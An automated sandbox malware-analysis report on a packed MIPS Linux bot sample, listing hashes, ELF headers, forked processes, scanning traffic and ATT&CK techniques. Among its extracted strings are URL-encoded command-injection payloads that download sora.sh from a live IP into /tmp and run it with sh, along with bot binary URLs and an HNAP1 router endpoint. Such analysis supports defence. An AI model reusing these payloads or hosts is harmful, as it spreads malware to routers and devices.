File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Entropy (8bit):	7.892743277766513
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
File size:	28'968 bytes
MD5:	78f926e5a126c60fdfcc8f1ad8408f23
SHA1:	0d7406252edad6a3917633019d18ae9725cb6c16
SHA256:	0730e802398d5c9587f52806f5f35b749dec4b2a275d4cdc84aa27e60f4cd42e
SHA512:	3ecb15a7e8a89badef0e596ba490143bb02a7687ae20c0dca0ae25fcf0921ace1296b2d6cd1bf723898c7a8ad97a78a1946f1a1acf8dc7c0f970d0e42b52d4b4
SSDEEP:	768:nGjet9cdlFBDvBG2CwbGuBH4f0qJ/hC81D9jfRG6A+NIQBJgGlzDpbuR1JG:GjVrB7E2CKt/S1fR2qTVJuY
TLSH:	68D2D02D8B4200E7D506C8BD25A057B03DF08B27AD928D6BA786ABD38F541F03977DE4
File Content Preview:	.ELF......................\....4.........4. ...(......................o...o................H.E.H.E.H...................[UPX!.d.....................U.......?.E.h4...@b..) ..]....E...5..;.\.Z=.k`N.,........Q.Y.)(w....W.e......3:.t.{....g ....,..Xj..........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x105cb8
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x100000	0x100000	0x6ffc	0x6ffc	7.8963	0x5	R E	0x10000
LOAD	0xa148	0x45a148	0x45a148	0x0	0x0	0.0000	0x6	RW	0x10000

Network Behavior

Report size exceeds maximum size, please checkout the PCAP download to see all network behavior

System Behavior

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6235, Parent PID: 6154

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6240, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6243, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6244, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6247, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6249, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6250, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6251, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6252, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6253, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6255, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6256, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6263, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6265, Parent PID: 6237

General

Start time (UTC):	10:27:51
Start date (UTC):	24/11/2023
Path:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf	ReversingLabs: Detection: 51%
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf	Virustotal: Detection: 54%			Perma Link

Source: unknown	TCP traffic detected without corresponding DNS query: 197.84.70.159
Source: unknown	TCP traffic detected without corresponding DNS query: 197.251.211.102
Source: unknown	TCP traffic detected without corresponding DNS query: 197.101.147.7
Source: unknown	TCP traffic detected without corresponding DNS query: 197.88.43.92
Source: unknown	TCP traffic detected without corresponding DNS query: 197.204.9.127
Source: unknown	TCP traffic detected without corresponding DNS query: 197.216.35.163
Source: unknown	TCP traffic detected without corresponding DNS query: 197.111.58.40
Source: unknown	TCP traffic detected without corresponding DNS query: 197.62.34.123
Source: unknown	TCP traffic detected without corresponding DNS query: 197.3.227.152
Source: unknown	TCP traffic detected without corresponding DNS query: 197.84.252.130
Source: unknown	TCP traffic detected without corresponding DNS query: 197.205.230.69
Source: unknown	TCP traffic detected without corresponding DNS query: 197.95.229.214
Source: unknown	TCP traffic detected without corresponding DNS query: 197.147.92.59
Source: unknown	TCP traffic detected without corresponding DNS query: 197.192.47.217
Source: unknown	TCP traffic detected without corresponding DNS query: 197.56.22.33
Source: unknown	TCP traffic detected without corresponding DNS query: 197.180.151.58
Source: unknown	TCP traffic detected without corresponding DNS query: 197.123.157.1
Source: unknown	TCP traffic detected without corresponding DNS query: 197.251.29.208
Source: unknown	TCP traffic detected without corresponding DNS query: 197.163.28.100
Source: unknown	TCP traffic detected without corresponding DNS query: 197.195.165.123
Source: unknown	TCP traffic detected without corresponding DNS query: 197.67.100.255
Source: unknown	TCP traffic detected without corresponding DNS query: 197.105.14.103
Source: unknown	TCP traffic detected without corresponding DNS query: 197.243.108.186
Source: unknown	TCP traffic detected without corresponding DNS query: 197.52.71.144
Source: unknown	TCP traffic detected without corresponding DNS query: 197.241.149.190
Source: unknown	TCP traffic detected without corresponding DNS query: 197.37.125.32
Source: unknown	TCP traffic detected without corresponding DNS query: 197.71.28.72
Source: unknown	TCP traffic detected without corresponding DNS query: 197.126.157.160
Source: unknown	TCP traffic detected without corresponding DNS query: 197.86.176.16
Source: unknown	TCP traffic detected without corresponding DNS query: 197.23.6.63
Source: unknown	TCP traffic detected without corresponding DNS query: 197.183.180.132
Source: unknown	TCP traffic detected without corresponding DNS query: 197.97.177.14
Source: unknown	TCP traffic detected without corresponding DNS query: 197.213.199.171
Source: unknown	TCP traffic detected without corresponding DNS query: 197.129.172.191
Source: unknown	TCP traffic detected without corresponding DNS query: 197.3.218.234
Source: unknown	TCP traffic detected without corresponding DNS query: 197.161.252.190
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.47.212
Source: unknown	TCP traffic detected without corresponding DNS query: 197.116.59.240
Source: unknown	TCP traffic detected without corresponding DNS query: 197.113.25.9
Source: unknown	TCP traffic detected without corresponding DNS query: 197.9.145.32
Source: unknown	TCP traffic detected without corresponding DNS query: 197.8.155.4
Source: unknown	TCP traffic detected without corresponding DNS query: 197.1.34.240
Source: unknown	TCP traffic detected without corresponding DNS query: 197.227.15.58
Source: unknown	TCP traffic detected without corresponding DNS query: 197.130.101.124
Source: unknown	TCP traffic detected without corresponding DNS query: 197.125.42.160
Source: unknown	TCP traffic detected without corresponding DNS query: 197.69.96.242
Source: unknown	TCP traffic detected without corresponding DNS query: 197.138.74.230
Source: unknown	TCP traffic detected without corresponding DNS query: 197.21.206.159
Source: unknown	TCP traffic detected without corresponding DNS query: 197.250.175.229
Source: unknown	TCP traffic detected without corresponding DNS query: 197.40.226.249

Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/bins/sora.mips
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/bins/sora.mips;
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/bins/sora.mpsl;chmod
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/bins/sora.x86
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/sora.sh
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf, 6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf	String found in binary or memory: http://upx.sf.net

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

System Behavior

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6235, Parent PID: 6154

General

File Activities

File Opened

File Read

Process Activities

Process Forked

Prctl Requested

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6237, Parent PID: 6235

General

Process Activities

Process Forked

Chronological Activities

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6239, Parent PID: 6237

General

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6240, Parent PID: 6237

General

Analysis Process: SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf PID: 6243, Parent PID: 6237

Linux Analysis Report
SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf